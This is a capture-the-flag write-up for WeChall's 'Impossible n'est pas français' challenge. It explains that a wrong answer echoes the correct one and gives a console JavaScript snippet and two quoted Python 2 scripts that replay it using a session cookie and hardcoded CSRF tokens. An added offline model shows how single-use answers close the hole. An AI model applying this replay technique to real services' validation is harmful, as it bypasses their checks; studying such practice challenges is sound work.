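Impossible n'est pas français (Exploit) Answer
Solution
Straight to the approach. First click "Click here to request a new number"
to request a number, then submit any wrong answer; the system returns the correct answer to us.
So the key to this challenge is to submit the echoed answer back quickly.
JS
This is a JS script I wrote myself.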
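// Error box that echoes the correct answer after a wrong submission
var text = document.getElementsByClassName("gwf_errors")[0].innerText;
// Cut the number out of the message (the offsets depend on the exact message text)
var num = text.substr(40, text.length - 41);
// Fill in the answer field and click the submit button
var inputs = document.getElementsByTagName("tbody")[0].getElementsByTagName("input");
inputs[0].value = num;
inputs[1].click();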
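First press F12 to open the developer tools, switch to the Console panel and paste the code above, but do not press Enter to run it yet.
Then open the request-new-number link in a new tab, enter 1 in the answer input box
and submit it.
The page now shows the correct answer. Quickly press Enter to run the code above, and it succeeds!
Python 2
Below are two pieces of Python 2 code for reference.
This code comes from OtherFiles/WeChall.md at master · lc4t/OtherFiles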
# coding=utf-8
import re
import requests
from bs4 import BeautifulSoup

# Session cookie of the logged-in WeChall account ('你的cookie' means "your cookie")
cookie = {
    'WC': '你的cookie'
}


def getNumber():
    # Ask the server to issue a new number for this session
    url = 'http://www.wechall.net/challenge/impossible/index.php?request=new_number'
    result = requests.get(url, cookies=cookie)


def getAnswer():
    getNumber()
    url = 'http://www.wechall.net/challenge/impossible/index.php'
    # Deliberately wrong answer; gwf3_csrf is the form token from the original author's session
    data = {
        'solution': '123',
        'cmd': 'Send',
        'gwf3_csrf': 'EioRwZvt'
    }
    result = requests.post(url, cookies=cookie, data=data)
    text = BeautifulSoup(result.text).get_text()
    # The error message contains the correct answer in double quotes
    answer = re.compile(r'"(\d+)"').findall(text)[0]
    return answer


def send():
    url = 'http://www.wechall.net/challenge/impossible/index.php'
    # Submit the echoed answer right away
    data = {
        'solution': getAnswer(),
        'cmd': 'Send',
        'gwf3_csrf': 'EioRwZvt'
    }
    result = requests.post(url, cookies=cookie, data=data)
    print result.text
    # print 'Ok'


send()
The following one comes from WeChall Journal | 陈文青
#!/usr/bin/env python
# coding=utf-8
import re
import lxml
import lxml.html as H
import requests

# Session cookie of the logged-in WeChall account ('你的cookie' means "your cookie")
cookie = {
    'WC': '你的cookie'
}


def get_number():
    # Ask the server to issue a new number and return the text of the page
    number_url = 'http://www.wechall.net/challenge/impossible/index.php?request=new_number'
    resp = requests.get(number_url, cookies=cookie)
    d = H.document_fromstring(resp.text)
    return str(d.xpath('//div[@id=\'page\']')[0].text_content()).strip()


print get_number()


def get_answer():
    # Deliberately wrong answer; gwf3_csrf is the form token from the original author's session
    post_data = {
        'solution': '1+12',
        'cmd': 'Send',
        'gwf3_csrf': '2XDoWTUR'
    }
    url = 'http://www.wechall.net/challenge/impossible/index.php'
    resp = requests.post(url, cookies=cookie, data=post_data)
    # print resp.text
    d = H.document_fromstring(resp.text)
    # The error message contains the correct answer in double quotes
    ar = re.compile(r'"(\d+)"')
    text = d.xpath('//div[@class=\'gwf_errors\']/ul/li')[0].text_content()
    ans = ar.findall(text)[0]
    print ans
    # Submit the echoed answer right away
    post_data = {
        'solution': ans,
        'cmd': 'Send',
        'gwf3_csrf': '2XDoWTUR'
    }
    resp = requests.post(url, cookies=cookie, data=post_data)
    print resp.text


get_answer()
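The behaviour this write-up relies on (a wrong submission echoes the correct answer, and that answer is still accepted afterwards) can be modelled offline. The following is an added example, not code from the original post or from WeChall: a constructed model of the server side in which the class and function names, the message wording and the 5-second window are assumptions. It shows that the replay succeeds while the answer stays valid and fails once any attempt consumes the challenge.

```python
import re
import secrets
import time

ANSWER_RE = re.compile(r'"(\d+)"')  # same pattern the scripts on this page use


class ChallengeSession:
    """Constructed model of the server side; not WeChall's code."""

    def __init__(self, single_use, window=5.0, clock=time.monotonic):
        self.single_use = single_use  # True = hardened variant
        self.window = window          # assumed time limit in seconds
        self.clock = clock
        self.answer = None
        self.issued_at = 0.0

    def new_number(self):
        # Always 12 digits, so the probe value '1' can never be correct.
        self.answer = str(10**11 + secrets.randbelow(10**11))
        self.issued_at = self.clock()

    def submit(self, solution):
        if self.answer is None:
            return False, 'Request a new number first.'
        expected = self.answer
        expired = self.clock() - self.issued_at > self.window
        if self.single_use or expired or solution == expected:
            self.answer = None  # challenge consumed
        if expired:
            return False, 'Too slow.'
        if solution == expected:
            return True, 'Correct.'
        # The error message echoes the expected answer, as the post observes.
        return False, 'Wrong! The answer was "%s".' % expected


def replay_leaked_answer(session):
    """The two-request flow from the post, run against the model."""
    session.new_number()
    _, message = session.submit('1')        # deliberately wrong probe
    leaked = ANSWER_RE.findall(message)
    if not leaked:
        return False
    solved, _ = session.submit(leaked[0])   # replay the echoed value
    return solved


if __name__ == '__main__':
    print('answer stays valid:', replay_leaked_answer(ChallengeSession(False)))
    print('single-use answer :', replay_leaked_answer(ChallengeSession(True)))
```

In the single-use variant the message still echoes the old answer, which is harmless because that answer can no longer be redeemed.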